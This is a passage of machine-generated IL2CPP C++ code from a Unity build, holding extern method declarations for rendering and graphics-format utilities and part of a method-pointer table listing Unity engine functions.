extern void TexturePlayableOutput_GetHandle_m482C2E6F3FB849142FA7936B1B6A0B9B072A1899 (void);
// 0x00000999 System.Boolean UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::TickRealtimeProbes()
extern void BuiltinRuntimeReflectionSystem_TickRealtimeProbes_m0CD6423541B0FCB022D55498C348A013E06E5F39 (void);
// 0x0000099A System.Void UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::Dispose()
extern void BuiltinRuntimeReflectionSystem_Dispose_m2CDBD30196F65463B8E86AC97DA2370A4D68762D (void);
// 0x0000099B System.Void UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::Dispose(System.Boolean)
extern void BuiltinRuntimeReflectionSystem_Dispose_m6B57B7E11B7A095063597FBCB0C6EE7036003F6B (void);
// 0x0000099C System.Boolean UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::BuiltinUpdate()
extern void BuiltinRuntimeReflectionSystem_BuiltinUpdate_mBE5DAA71BBDC02A11C21A49284078055C7294DB0 (void);
// 0x0000099D UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::Internal_BuiltinRuntimeReflectionSystem_New()
extern void BuiltinRuntimeReflectionSystem_Internal_BuiltinRuntimeReflectionSystem_New_m37D7A68062DA942ACF90E1C41CF749BD948CA91B (void);
// 0x0000099E System.Void UnityEngine.Experimental.Rendering.BuiltinRuntimeReflectionSystem::.ctor()
extern void BuiltinRuntimeReflectionSystem__ctor_mC85D8357332DEC8325E27837409E463208ACE0E5 (void);
// 0x0000099F System.Boolean UnityEngine.Experimental.Rendering.IScriptableRuntimeReflectionSystem::TickRealtimeProbes()
// 0x000009A0 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemSettings::set_Internal_ScriptableRuntimeReflectionSystemSettings_system(UnityEngine.Experimental.Rendering.IScriptableRuntimeReflectionSystem)
extern void ScriptableRuntimeReflectionSystemSettings_set_Internal_ScriptableRuntimeReflectionSystemSettings_system_m668B05191322016F7A1AA39FF3A3B9B0BF8EC621 (void);
// 0x000009A1 UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemWrapper UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemSettings::get_Internal_ScriptableRuntimeReflectionSystemSettings_instance()
extern void ScriptableRuntimeReflectionSystemSettings_get_Internal_ScriptableRuntimeReflectionSystemSettings_instance_mAE76D73D6D2AED40835CED5D925ED7F8699A8560 (void);
// 0x000009A2 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemSettings::ScriptingDirtyReflectionSystemInstance()
extern void ScriptableRuntimeReflectionSystemSettings_ScriptingDirtyReflectionSystemInstance_m5A0AEF7B0F924A6DAF5E9762FF44D5E24A9F8762 (void);
// 0x000009A3 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemSettings::.cctor()
extern void ScriptableRuntimeReflectionSystemSettings__cctor_m96B1BF54CF4E66158F55682A042AF76A9F40130B (void);
// 0x000009A4 UnityEngine.Experimental.Rendering.IScriptableRuntimeReflectionSystem UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemWrapper::get_implementation()
extern void ScriptableRuntimeReflectionSystemWrapper_get_implementation_m1AFA781CCFEFE334D758AC43A9FAB9E0FB0F5C40 (void);
// 0x000009A5 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemWrapper::set_implementation(UnityEngine.Experimental.Rendering.IScriptableRuntimeReflectionSystem)
extern void ScriptableRuntimeReflectionSystemWrapper_set_implementation_mF1552E093F0F437DF191D7CBB0CF7981C36744D8 (void);
// 0x000009A6 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemWrapper::Internal_ScriptableRuntimeReflectionSystemWrapper_TickRealtimeProbes(System.Boolean&)
extern void ScriptableRuntimeReflectionSystemWrapper_Internal_ScriptableRuntimeReflectionSystemWrapper_TickRealtimeProbes_mDC08C9639CAF2D13623E82B3A9C51689D2FED2B3 (void);
// 0x000009A7 System.Void UnityEngine.Experimental.Rendering.ScriptableRuntimeReflectionSystemWrapper::.ctor()
extern void ScriptableRuntimeReflectionSystemWrapper__ctor_mCF4DB3AC3AEB1FC08CB03DD0C1733E9BDED4DF8D (void);
// 0x000009A8 UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetGraphicsFormat(UnityEngine.TextureFormat,System.Boolean)
extern void GraphicsFormatUtility_GetGraphicsFormat_m40311CC93B197CDA001DB530FA6A7145BDF704A5 (void);
// 0x000009A9 UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetGraphicsFormat_Native_TextureFormat(UnityEngine.TextureFormat,System.Boolean)
extern void GraphicsFormatUtility_GetGraphicsFormat_Native_TextureFormat_mF6A18A9F7496D46903888ED53547C363AF19184C (void);
// 0x000009AA UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetGraphicsFormat(UnityEngine.RenderTextureFormat,System.Boolean)
extern void GraphicsFormatUtility_GetGraphicsFormat_m9C447321AA5B70BA35F3A23DFC772D449D92A315 (void);
// 0x000009AB UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetGraphicsFormat_Native_RenderTextureFormat(UnityEngine.RenderTextureFormat,System.Boolean)
extern void GraphicsFormatUtility_GetGraphicsFormat_Native_RenderTextureFormat_m10F2C422C5C6EEF684F56DB801358A954146B964 (void);
// 0x000009AC UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetGraphicsFormat(UnityEngine.RenderTextureFormat,UnityEngine.RenderTextureReadWrite)
extern void GraphicsFormatUtility_GetGraphicsFormat_m86331B6F407E9C3648A3D628E2BC4059AC760DD2 (void);
// 0x000009AD UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetDepthStencilFormatFromBitsLegacy_Native(System.Int32)
extern void GraphicsFormatUtility_GetDepthStencilFormatFromBitsLegacy_Native_m7B1F1DEB5E33586ECC1C6784C94D51BDAB184AD8 (void);
// 0x000009AE UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetDepthStencilFormat(System.Int32)
extern void GraphicsFormatUtility_GetDepthStencilFormat_mF758A2225A636091FBA343397A283528ED220F54 (void);
// 0x000009AF System.Int32 UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetDepthBits(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_GetDepthBits_m7C5BCA03BDC9D6BB350456212F09680235D425BD (void);
// 0x000009B0 UnityEngine.Experimental.Rendering.GraphicsFormat UnityEngine.Experimental.Rendering.GraphicsFormatUtility::GetDepthStencilFormat(System.Int32,System.Int32)
extern void GraphicsFormatUtility_GetDepthStencilFormat_mE3B35D143A479910D8CC18D52F262ACD17E81AFA (void);
// 0x000009B1 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsSRGBFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_IsSRGBFormat_m702627893B74D5F872332A624D7CBAF78D65EBC1 (void);
// 0x000009B2 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsCompressedTextureFormat(UnityEngine.TextureFormat)
extern void GraphicsFormatUtility_IsCompressedTextureFormat_m9FDE191A4DE321B22EB81C114F8FA2F6CADC180F (void);
// 0x000009B3 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::CanDecompressFormat(UnityEngine.Experimental.Rendering.GraphicsFormat,System.Boolean)
extern void GraphicsFormatUtility_CanDecompressFormat_mED04A575F2ED1B0B4C81952AA7A117B712DA2810 (void);
// 0x000009B4 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::CanDecompressFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_CanDecompressFormat_m7ACC154740876AA86DEB68AD574B1B11E32AF3A3 (void);
// 0x000009B5 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsDepthFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_IsDepthFormat_m3D8224CDEBB70B7448296A8E1D5812CD84958807 (void);
// 0x000009B6 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsStencilFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_IsStencilFormat_mE2080DBEEDB4D099B1D86561D23781FB6E5F7429 (void);
// 0x000009B7 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsPVRTCFormat(UnityEngine.Experimental.Rendering.GraphicsFormat)
extern void GraphicsFormatUtility_IsPVRTCFormat_mC62806D7A140997254739739A47FB9716C0A79BC (void);
// 0x000009B8 System.Boolean UnityEngine.Experimental.Rendering.GraphicsFormatUtility::IsCrunchFormat(UnityEngine.TextureFormat)
extern void GraphicsFormatUtility_IsCrunchFormat_m397B4BA9DCEF6DF734F3F4B349A0D60B235A476E (void);
// 0x000009B9 System.Void UnityEngine.Experimental.Rendering.GraphicsFormatUtility::.cctor()
extern void GraphicsFormatUtility__cctor_m4A3699EA318A3907272B8FF97CBE4FA92910B9D8 (void);
static Il2CppMethodPointer s_methodPointers[2489] =
{
EmbeddedAttribute__ctor_m93D23E0241AEA98DE88285ECFB378AAD361CDC83,
IsReadOnlyAttribute__ctor_m627542EC70C984B1DB3E6F048AE53E121339B9BF,
MonoPInvokeCallbackAttribute__ctor_mF43F06AF092A13B71E6D0C5456A5FC5ABDCC5893,
MathfInternal__cctor_mC2F676B6F0CC5E10406BB514D669BD196368295F,
TypeInferenceRuleAttribute__ctor_m356F2A18ACB338DE48EADD04E97C971C554EDDE0,
TypeInferenceRuleAttribute__ctor_mECD854F0BC27EC215F4BD1C6F0CECA9BEC090E0D,
TypeInferenceRuleAttribute_ToString_m009A152A07FC88BF49F1C72FC615F2FB7350F2BD,
GenericStack__ctor_mD21753D674298C09F3684F19DD42680323055586,
ProfilerMarker__ctor_mDD68B0A8B71E0301F592AF8891560150E55699C8,
ProfilerMarker_Auto_m133FA724EB95D16187B37D2C8A501D7E989B1F8D,
AutoScope__ctor_m7F63A273E382CB6328736B6E7F321DDFA40EA9E3,
AutoScope_Dispose_mED763F3F51261EF8FB79DB32CD06E0A3F6C40481,
ProfilerUnsafeUtility_CreateMarker_m27DDE00D41B95677982DBFCE074D45B79E50C7CC,
ProfilerUnsafeUtility_BeginSample_m1C6D6ED1C8E0CB2FD0934EB6EA333276F67C14F6,
ProfilerUnsafeUtility_EndSample_mE2F7A0DB4C52105F7CD135ED8816A2BB98E663CC,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
JobHandle_Complete_mDCED35A125AAB37EDDAB2E31C805B4904B614A4A,
JobHandle_get_IsCompleted_m834D40CA77C5F2EC575592BD5DEB60B66ACCF941,
JobHandle_ScheduleBatchedJobs_mD80F0AB54AEA1D1A107F4B7B84EE5288FD895A93,
JobHandle_ScheduleBatchedJobsAndComplete_m144E743D5269628B3997C49CF662CEC9667806F2,
JobHandle_ScheduleBatchedJobsAndIsCompleted_m43A03A48CB70913C6E2334C81CCAE5C2B9C93F21,
JobHandle_CombineDependencies_mC8F0655BA478BF3F10310B0E88292F1D1193E8D9,
JobHandle_CombineDependencies_m11478F947EE83F605008092EB5C6841AFAF34D78,
JobHandle_CombineDependenciesInternal2_m20BFAE01512A668E796AC2642AA7D25DB01849C1,
JobHandle_CombineDependenciesInternal3_m71AB14E7E0785383C2A337564805D9A18B3F7643,
JobHandle_CombineDependenciesInternal2_Injected_mB9AE570247CDA3D571F854403B4464102A4C1B35,
JobHandle_CombineDependenciesInternal3_Injected_m5393968E9BEF5FE959BA5617BF2A16D4B3EF5E90,
JobProducerTypeAttribute__ctor_m562A2FC62E2DF7109DD703C0270B0B372607C534,
JobsUtility_GetWorkStealingRange_m941A4BC142F1C27DE003B567505EC4B221262BF2,
JobsUtility_Schedule_m63C86A632576045CD38E98D72689F3EDCD9F4DB0,
JobsUtility_ScheduleParallelFor_m425760131B06EE0CD58F834A596704AF65D162DD,
JobsUtility_CreateJobReflectionData_mA38915E5A40FAFA940DB77B618060D9B3E8EDA1B,
JobsUtility_CreateJobReflectionData_mB75CBA88EB2ABDD80D0AA9AE04010B48A0976174,
JobsUtility_Schedule_Injected_mE1C374BED8057D4BF47229EB3C1B893F56E3211C,
JobsUtility_ScheduleParallelFor_Injected_m65B74A7455652034C682B9923EBFB415E1D58068,
JobScheduleParameters__ctor_m5FFED3B28A1FA2C3EC7D1C50A7D7E788C411CE04,
Il2CppEagerStaticClassConstructionAttribute__ctor_m124F17545F01CC678CE74870FC9EE5D4891EE935,
ReadOnlyAttribute__ctor_m1AD04580EB8D01BE1657F42BB7B5B7AB7A08C90A,
WriteOnlyAttribute__ctor_m90E53F74454BA0EFE06FEAB8291AEDE5F7048AE5,
DeallocateOnJobCompletionAttribute__ctor_m94AB41219362107F93798DC376D13E1750E5854E,
NativeDisableParallelForRestrictionAttribute__ctor_m2D113DB59E3B06AF43DDDB4612EEB3A016CFA11E,
NativeLeakDetection_Initialize_m900BC4C2835A26E5ACE3CFB8A33263AB7704EBDD,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NativeContainerAttribute__ctor_m9249B57B7D6F9E1D425EC32392FB975B8568AD9B,
NativeContainerSupportsMinMaxWriteRestrictionAttribute__ctor_m340DBE8A3B007A450B4643E7350C29D92514B782,
NativeContainerSupportsDeallocateOnJobCompletionAttribute__ctor_mBE27310D46174944DF46D01B8AE4BBE69DA94729,
NativeContainerSupportsDeferredConvertListToArray__ctor_m40F59B7627032F45D2ED023BA9525EEF40660C27,
WriteAccessRequiredAttribute__ctor_mB36E4CF6313543DEB0DFA64575446C5ABB6F4C8B,
NativeDisableUnsafePtrRestrictionAttribute__ctor_m8E1BE43B9791FD4E5790060D6506003D35F081CC,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
UnsafeUtility_Malloc_mA79BF3D6FC86F67D4354A6C8481DB0F13FD6777B,
UnsafeUtility_Free_mA951B190894E1755DE821FCBD35F7AD9FB388F18,
UnsafeUtility_MemCpy_m019E657B952C27F705607F0F3D371EEE526B716B,
UnsafeUtility_MemCpyReplicate_m234798F59C7D37255F0DF4BD59C48A72F2D9B436,
UnsafeUtility_MemCpyStride_mE53A7840FB9957CF249E75DFFB96EAB5D29EDA34,
UnsafeUtility_MemSet_mDC75E5E3857CCA05AB3AF19D53BF9DBCB21F923B,
UnsafeUtility_MemClear_m0535B03E39A2A8CF84AE517549902F0025F67460,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NotNullAttribute__ctor_mBD764326957BF5036FB7217B794F6B48B73A6B51,
PureAttribute__ctor_mEAFD7538811204E5F43B816F28B63FA197A6A09A,
SortingLayer_GetLayerValueFromID_mBB4C1609D3D68940C64087C874E16A817D90321B,
Keyframe__ctor_mECF144086B28785BE911A22C06194A9E0FBF3C34,
Keyframe__ctor_m0E7D85642F12A3DAFA1768351CC7670648C41AB2,
Keyframe_get_time_mB8886F64CBB373936C0C25C4C68397C05779F661,
Keyframe_set_time_m98F165193486C0DF1611B562016595B18052A2D6,
Keyframe_get_value_m53E6B7609086AAAA46E24BAF734EF08E16A3FD6C,
Keyframe_set_value_m396D6040A4AB72ED5B9797E8C92DD806FA6F5431,
Keyframe_set_inTangent_m4CBBDDEE23D6E1E498580A6E1C2661E57CD38363,
Keyframe_set_outTangent_m68F2F86E292344CAB2600787D244019B95A89DFE,
AnimationCurve_Internal_Destroy_mDE388BCCEEA6BE0F27CEA09A047618304DEC68F6,
AnimationCurve_Internal_Create_m40E65549F706F1109BE743E2FCDBE06D42556499,
AnimationCurve_Internal_Equals_mEBA61732FE57654C4E3AF5B317918D1641E36050,
AnimationCurve_Finalize_m803AC16166EE497C4DFA996B15692D91F4D04C3C,
AnimationCurve_Evaluate_m50B857043DE251A186032ADBCBB4CEF817F4EE3C,
AnimationCurve_get_keys_m34452C69464AB459C04BFFEA4F541F06B419AC4E,
AnimationCurve_set_keys_mBE1284B44CDBB1D8381177A3D581A6E71467F95C,
AnimationCurve_get_Item_mD4E73EE674F7A82673F1A9CEB8E5EF86BA47E64B,
AnimationCurve_get_length_m259A67BB0870D3A153F6FEDBB06CB0D24089CD81,
AnimationCurve_SetKeys_m68D6CAD69A3023D8DA02F66890BE2E2A76ACEE6D,
AnimationCurve_GetKey_m22E6B8D1548BBE2F08141ABFBAE0BFC3779FC08E,
AnimationCurve_GetKeys_mB151732233920FC27E3842AE48D0557F29074C29,
AnimationCurve_Linear_m9C6C4ECB6BF4F0515EBD4EFDA97CF623B92B1362,
AnimationCurve_EaseInOut_mA8461373A0FC9464E20724CAD519973F85FE4A15,
AnimationCurve__ctor_mEABC98C03805713354D61E50D9340766BD5B717E,
AnimationCurve__ctor_m0D976567166F92383307DC8EB8D7082CD34E226F,
AnimationCurve_Equals_mE47717A57755581C546986799C9DBC64D98928A9,
AnimationCurve_Equals_mC44657401804A22DCA648BD8495FC4E8A2F088A3,
AnimationCurve_GetHashCode_m1AEBC4C469357E1FA2541CC4B8D2B39C284CF8F6,
AnimationCurve_GetKey_Injected_mDE9640F589CB065C6872F3B61F27F2F759C83C0F,
Application_get_isPlaying_m0B3B501E1093739F8887A0DAC5F61D9CB49CC337,
Application_get_isFocused_m5E2835D701463AB393851163788F1F2DF3770E3E,
Application_get_isBatchMode_mBE1AD2AA536A0252E56EF19F72E3EA31A8733EE9,
Application_get_dataPath_mBBC742FA17F8BD4156C4CB98480BEFBFB0BBB6D9,
Application_OpenURL_m9F74228B576891156330C84B72218C08BEB9F564,
Application_get_targetFrameRate_mB9877E89AFCF1CF0651D9471D5152490BF66BE5E,
Application_set_targetFrameRate_m794A13DC5116C506B042663606691257CF3A7325,
Application_get_platform_m1AB34E71D9885B120F6021EB2B11DCB28CD6008D,
Application_CallLowMemory_mEDE4C1A091B81B3A96F2BC498EE8467D38A54D0E,
Application_CallLogCallback_mAF3C44463FC74C427245D3C057D6C71F584D7FAD,
Application_add_onBeforeRender_m10ABDBFFB06BEA4E016EDE6AFBAF474986DF03EE,
Application_remove_onBeforeRender_m8E7F9777E8D9C69269A69D2429B8C32A24A52597,
Application_add_quitting_m0FEF9560C9CB99F40EEE8585455B4461101F70F4,
Application_remove_quitting_mC309C9BF095DF4D065340A2F47CC69FC6F7BEFB9,
Application_Internal_ApplicationWantsToQuit_m5D925FE7AA2E59A1CCCA8783ECDFAFA43FD94EA9,
Application_Internal_ApplicationQuit_m72090516F3E7794420B7D8F9A748F37ECE28CC33,
Application_Internal_ApplicationUnload_m7809D21025D13B748A204471D021FDF14DE4CA4F,
Application_InvokeOnBeforeRender_m95B5893DA961B70E61B0C8A89DA121E48D9DFA5F,
Application_InvokeFocusChanged_m7C803F5C1A2F5CCE59FBE0F03DE7FE254009650B,
Application_InvokeDeepLinkActivated_m8E9FC172650F96B9374AA13BF0F57488D340E008,
Application_get_isEditor_m0377DB707B566C8E21DA3CD99963210F6D57D234,
LowMemoryCallback__ctor_m3B5E06F22A115B898C51A5C4B20166E2A92E0375,
LowMemoryCallback_Invoke_m3B2AE4EC5556D1D98237EF965477487AE4C7D708,
LogCallback__ctor_m327A4C69691F8A4B01D405858E48B8A7D9D2A79D,
LogCallback_Invoke_m88EACBF170351AE6FC8E6F5154CD09179D67BB47,
BootConfigData_WrapBootConfigData_m8A49BB7810C2869C7E043264CD7CC04226FB4E84,
BootConfigData__ctor_m67B06923C40A5363192040A89BB92479B4B74A9A,
Camera__ctor_m6D8568D99066C871656AC9A712A43D96A413BEBA,
Camera_get_nearClipPlane_m5E8FAF84326E3192CB036BD29DCCDAF6A9861013,
Camera_set_nearClipPlane_m78482B5E4E0CE4C195D9CE0332AA75B2D9CCDDF6,
Camera_get_farClipPlane_m1D7128B85B5DB866F75FBE8CEBA48335716B67BD,
Camera_set_farClipPlane_m84EF39B09573168734613481FD979BFF31C60139,
Camera_get_fieldOfView_m9A93F17BBF89F496AE231C21817AFD1C1E833FBB,
Camera_set_fieldOfView_m5AA9EED4D1603A1DEDBF883D9C42814B2BDEB777,
Camera_get_orthographicSize_m7950C5627086253E02992A43ADFE59039DB473F8,
Camera_set_orthographicSize_m76DD021032ACB3DDBD052B75EC66DCE3A7295A5C,
Camera_get_orthographic_m904DEFC76C54DA4E30C20A62A86D5D87B7D4DD8F,
Camera_set_orthographic_m64915C0840A68E526830A69F1C40257206185020,
Camera_get_depth_mDF67FFF8ED61750467DFC4C6D8F236850AD1BB1D,
Camera_get_aspect_m48BF8820EA2D55BE0D154BC5546819FB65BE257D,
Camera_get_cullingMask_m6F5AFF8FB522F876D99E839BF77D8F27F26A1EF8,
Camera_get_eventMask_mEBACB61FFA0C8AAF3495454BABA50EE70655290A,
Camera_get_clearFlags_mA74F538C124B391EF03C46A50CA7FF7B505B7602,
Camera_set_clearFlags_m66541D9CC43CBAA5FE7364A50D43CA5569FD4D93,
Camera_get_usePhysicalProperties_mCE30837910BC617288B1481EEE3CAC7C79E43192,
Camera_set_usePhysicalProperties_m4F99CCEBD78D6EAB21B772E947B2C683AC475814,
Camera_get_sensorSize_m9EEC10A868D29D7E84E6238A15B87EEC7EB40516,
Camera_set_sensorSize_mF303BEAEB38FCBE5B5E21D2AFA06FC3DA7B50DC7,
Camera_get_lensShift_m2B434351405FD7712043E440885C4A68DB51F538,
Camera_set_lensShift_m645CA635E70D7C7EC26E821D6EF7817375BCBD8D,
Camera_get_gateFit_mEFDFD12C908B47F5AB0DED2BC4355EB59C948C12,
Camera_set_gateFit_m010FFEDCE03AECD34A63F99A84B3FAAB3DC442E0,
Camera_get_pixelRect_m5F40F5C324EB252261F66962411EE08CC4BE39E7,
Camera_get_targetTexture_mC856D7FF8351476068D04E245E4F08F5C56A55BD,
Camera_get_targetDisplay_m204A169C94EEABDB491FA5A77CC684146B10DF80,
Camera_get_projectionMatrix_m9B943EFDD6418528A055321E14F75F1511DD9B4A,
Camera_set_projectionMatrix_m351820E6903139402FFFF40221B32D0C52B5A094,
Camera_ResetProjectionMatrix_m6C5F82F7CA38E39DC357A1C53C7DD26791C27AFD,
Camera_WorldToScreenPoint_m6612AF37FFBBACC568877D4AA3AD5F11C76D9657,
Camera_ScreenToWorldPoint_m29847A50FC277447010B0D119A601E348BC9C215,
Camera_WorldToScreenPoint_m26B4C8945C3B5731F1CC5944CFD96BF17126BAA3,
Camera_ScreenToWorldPoint_m5EA3148F070985EC72127AAC3448D8D6ABE6E7E5,
Camera_ScreenToViewportPoint_m8907015773080F63D1034CEDEDEA4AF14FB2F3C5,
Camera_ScreenPointToRay_mA8EEC93B0731C859D2FF29D7DECFB806E3D9F0CC,
Camera_ScreenPointToRay_mA27CE345E80542143237233D503A71392594AA9B,
Camera_ScreenPointToRay_m2887B9A49880B7AB670C57D66B67D6A6689FE315,
Camera_get_main_mF222B707D3BF8CC9C7544609EFC71CFB62E81D43,
Camera_get_current_m6D76274A65CF75DD2AE6CAC2A1DDADB39C184C66,
Camera_get_stereoEnabled_m33F6247051D68E8FFEF9C0EC34C6F4B4B53FC8AF,
Camera_GetAllCamerasCount_m3ED056EA416E335E2D6ADA2E91D288F497D06989,
Camera_GetAllCamerasImpl_m0EE908E2366A4F573C2894E6D40D7887947B7251,
Camera_get_allCamerasCount_mC8FB514B97339BE01C79CA0B68169FC5B617191C,
Camera_GetAllCameras_m6F7D929ADBED771F2EFAAF421B6E2026DF63126B,
Camera_AddCommandBufferImpl_m3C533A19EE77CD32098C5E3F2B7A1ADF809DAFCE,
Camera_RemoveCommandBufferImpl_mF9533F3C9C88200BF06C0C4969B6464E750145AD,
Camera_AddCommandBuffer_m2C1C3C2D93CB62D569714B3FFA694CAB9BF81A9A,
Camera_RemoveCommandBuffer_m7749BA282C14AA7E9E71A68E911F41D1B8429F11,
Camera_FireOnPreCull_m92F718274D638F4AA9F30D4C919BDCC93A48F52D,
Camera_FireOnPreRender_mFE161C310D5A088C896590C983885C9D01BA34A1,
Camera_FireOnPostRender_m75D9DF1EE0EB19B459AD0C96997D255D6EBD6A94,
Camera_get_sensorSize_Injected_m58F4E3216EBA9A36F3A719AFBE694A47D52E6293,
Camera_set_sensorSize_Injected_mD73656DF1BEA45C87DF8CCD53579A0D3D8406B04,
Camera_get_lensShift_Injected_m8BBC825BC7DB6675F470F3E66F7F761A9BB7DB17,
Camera_set_lensShift_Injected_mBF611201EA4F3D024088083AE21BA1591AEC8989,
Camera_get_pixelRect_Injected_mA85B24A9EDBD279189D560BD46B611E69C8EEDA3,
Camera_get_projectionMatrix_Injected_m7AB1A44CC7DA6767CD29CDA56E6144929775B5F9,
Camera_set_projectionMatrix_Injected_mAE3FA8C6DD7C8EDCCD9665475F620A62FA926AF2,
Camera_WorldToScreenPoint_Injected_m3D83428A7AC8033EB4D357DF55BFA2ED652DEB64,
Camera_ScreenToWorldPoint_Injected_m6647F532E4C7710768F6EB5BA507A0A696FC149F,
Camera_ScreenToViewportPoint_Injected_m08D0DAE62A0BAF0443871DAF87FE4B3F18CC45C2,
Camera_ScreenPointToRay_Injected_m9B7E1A86A79D7578D03345360E86AED3C8D09C59,
CameraCallback__ctor_mB48D13F30E749B551E4692E4F2D762C375F62B41,
CameraCallback_Invoke_m67E54F44AA3C83F0D9EF47A5FBC6AF43B0B26362,
BoundingSphere__ctor_mB76812ECBDD8BA5B3E246871C58F6FA6CA2061C7,
CullingGroup_SendEvents_m1A2EBF07AAD9556C847CF52C36A0F88E466CE4B8,
StateChanged__ctor_m1D704B739C7C0F0D91873D24D10A92942826F0C9,
StateChanged_Invoke_m050DE641598E0C558A8CC865EAD679194581182C,
ReflectionProbe_get_size_m1CABA0F90893A89F168D417083F013376F8365D5,
ReflectionProbe_set_size_m901ED70592B51139B62209031BD8C7377FB85BBB,
ReflectionProbe_set_center_m83F570812344A9C08156023C49405F080DA4D8FA,
ReflectionProbe_set_boxProjection_m419731665FD0ACD069C32AD25F4631B729D8A0B7,
ReflectionProbe_set_mode_m61AFCA93A8B5F5DF636006428D9F902F4F4E63B4,
ReflectionProbe_get_customBakedTexture_m991E0EF31DE68C86F00D821ADAA8A9663F73FDB7,
ReflectionProbe_set_customBakedTexture_m0DAEAFF41F7992D5646CE5C0EE1E906F718179DE,
ReflectionProbe_CallReflectionProbeEvent_m6C0D7A58B981F45146A55300A76D943C4DC9B1C8,
ReflectionProbe_CallSetDefaultReflection_mCEA9C6A516B81FCC668EA675D406FEA506F2ED30,
ReflectionProbe_get_size_Injected_mE56ED26CAD1E61ACDF09A1DA6FDCE35BC0067D01,
ReflectionProbe_set_size_Injected_m491149669865BF07B5F75302A48BAF3CCAD24235,
ReflectionProbe_set_center_Injected_mFA4555870272FAB3EF30F1F12D2BC342A2B8EAA7,
DebugLogHandler_Internal_Log_mCDF82FF0477166C9DDB0ECEDB48EE4BCBBDB4F79,
DebugLogHandler_Internal_LogException_mE01E7F56C7441415DDACFFFAC2C4E6FE15B76DB5,
DebugLogHandler_LogFormat_m216B169EF9B669F2ED4C59F6B9F326D4EBBDF821,
DebugLogHandler_LogException_mF66A663A86BF5D412BC9A4B3F92DA5CF61049F08,
DebugLogHandler__ctor_m1078DDBE735090C0215BFDF2409A376F10F7A070,
Debug_get_unityLogger_mA872400E9E585FCD6A2DE1717748A458545DE8A4,
Debug_ExtractStackTraceNoAlloc_m34102CFB9E68FE7B468574F30C6E2D508CF91704,
Debug_Log_m86567BCF22BBE7809747817453CACA0E41E68219,
Debug_Log_m825387C0A72F1965797D56C1F8AB0D6678F3F9BE,
Debug_LogError_m059825802BB6AF7EA9693FEBEEB0D85F59A3E38E,
Debug_LogError_m385F8F46AD9C455E80053F42571A7CE321915C0A,
Debug_LogErrorFormat_mA33C95EF832A60D72A7EE26074E13A86BE7E30C6,
Debug_LogErrorFormat_mB54A08E41171EF537253C2B5170EFB922FF4635A,
Debug_LogException_m82E44FEC6B03BC34AFC2CAF6583051570C60CB9E,
Debug_LogException_m6A7A404239B24E1C7CA358508923F47ABDF40D05,
Debug_LogWarning_mEF15C6B17CE4E1FA7E379CDB82CE40FCD89A3F28,
Debug_LogWarning_m5C8299150E64600CBF5C92706AD610C21D0C0DC5,
Debug_LogWarningFormat_m0D4A31935564D0FA042103C1231DBBD2ED0BC20A,
Debug_LogWarningFormat_m81731988A7BE74CCEFDEB0000C65C4DEED5CA8AE,
Debug_Assert_mC95931BE797761A2D7800908C0BA4B41D68B3216,
Debug_Assert_m9CA35857A4FF29506840C572F2C7BA233805B806,
Debug_LogAssertion_mC3BDB863CDF67D35AA001E42105DC4925FB028F4,
Debug_LogAssertionFormat_mE45B449CC92F29E605AF8CD01123F5A10C2C4B00,
Debug_CallOverridenDebugHandler_mDD875B192C7AB5D58590029EC5510FECD621590B,
